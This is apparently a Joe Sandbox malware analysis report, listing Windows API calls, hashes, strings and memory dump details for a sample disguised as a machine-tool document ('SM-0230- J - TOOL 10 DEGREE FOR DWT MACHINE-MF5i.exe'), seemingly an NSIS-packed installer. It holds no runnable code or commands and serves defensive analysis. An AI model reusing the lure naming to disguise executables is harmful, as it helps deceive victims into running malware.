                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                                                                                                                                                                                          • Instruction ID: c0e7c3dc5a7dcdb4abcf1ae6b2c94b9daad9c86c1f50bd1ad5aacfe77fb55035
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D01D77B14100ABDB10DBA49B0895D77A5A750315B304677D201F11D0D679C5559619
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                                                                                                                                                                                          • Instruction ID: a59996f4b7e9e068504c33c606b0867cc0e460aa155bd5cdf8ba5dd419a24ee0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36C04C71B482017ADA21CF509D49F0777696750B41F5544657220E50E0C6B4E450E62D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                                                                                                                                                                                          • Instruction ID: 65dbcc2540e3052566e14dce8ba9d4df8b534898b5f9aa1fd4013fdf277ded57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B092B6684200BADE228B00DD09F467AB2E7A8742F008024B200640B0CAB200A1DB19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                                                                                                          • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403CE1), ref: 00403F0E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                                                                                                                                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404913
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404968
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404974
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404986
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404989
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049C0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A55
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A94
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C44
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C59
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C7D
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C9D
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404CB2
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00404CC2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D3B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DF3
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00404E13
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404E73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(Call,Hil Setup: Installing), ref: 00404487
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404493
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                                                                                                                                                                                            • Part of subcall function 004054D7: GetDlgItemTextA.USER32(?,?,00000400,004044DC), ref: 004054EA
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,?,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457E
                                                                                                                                                                                                                            • Part of subcall function 004046D7: lstrlenA.KERNEL32(Hil Setup: Installing,Hil Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                            • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                            • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,Hil Setup: Installing), ref: 00404790
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: A$C:\Users\user\falden\myotonias\nonvoting$Call$Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 2624150263-2511203788
                                                                                                                                                                                                                          • Opcode ID: 0d3185227b72b593b0c9c2600799bd3f9534f23045c6af8c35ec4ed3e8376118
                                                                                                                                                                                                                          • Instruction ID: 52af94dd87b45bde8ff603abcb7252099f64fe51c68325ad3ba2cad582a3dd3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d3185227b72b593b0c9c2600799bd3f9534f23045c6af8c35ec4ed3e8376118
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8A18DB1900209ABDB11AFA5DC45BEFB6B8EF84314F14843BF611B62D1D77C8A418B69
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004073C0,?,?,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs, xrefs: 0040211D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                          • String ID: C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs
                                                                                                                                                                                                                          • API String ID: 123533781-893828937
                                                                                                                                                                                                                          • Opcode ID: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                                                                                                                                                                                          • Instruction ID: 73ba7e37247343007321aa60fc7c63e2173afb66a68b14033088ab5266f46407
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22513A75A00208BFDF10DFA4C988A9D7BB5FF48318F20416AF915EB2D1DB799941CB54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                                                                                                                                                                                          • Instruction ID: e04ffd14ad056a7bc966bca46badc1a9d7fcc05075aa2412e3ac1a9cf71dfd33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0A772508100AFE701EBB499499EE7778DB61314F60457BE241E21C1D7B849859B3A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040B6
                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004040E8
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004040F9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404108
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404117
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040411A
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404129
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 004041A3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040421D
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404226
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,?), ref: 00404239
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404246
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404249
                                                                                                                                                                                                                          • SendMessageA.USER32(00000111,?,00000000), ref: 00404275
                                                                                                                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404289
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: Call$LN$N$open
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405BD9,?,?), ref: 00405A79
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,00421AB0,00000400), ref: 00405A82
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(00421EB0,00421EB0,00000400), ref: 00405A9F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405ABD
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BAD
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                                                                                                                                                                                          • CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F69
                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00405FB0
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 00405FA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F66
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403F82
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403F8E
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403F9A
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403FAD
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403FBD
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403FD7
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction ID: 69fcdb6fe5d9844d1d3a4f02655feb6370c96159658ebf8fe0858d801e39bc44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A215471904705ABCB219F78DD48F4BBFF8AF01715B048A29F895E22E0D735EA04CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
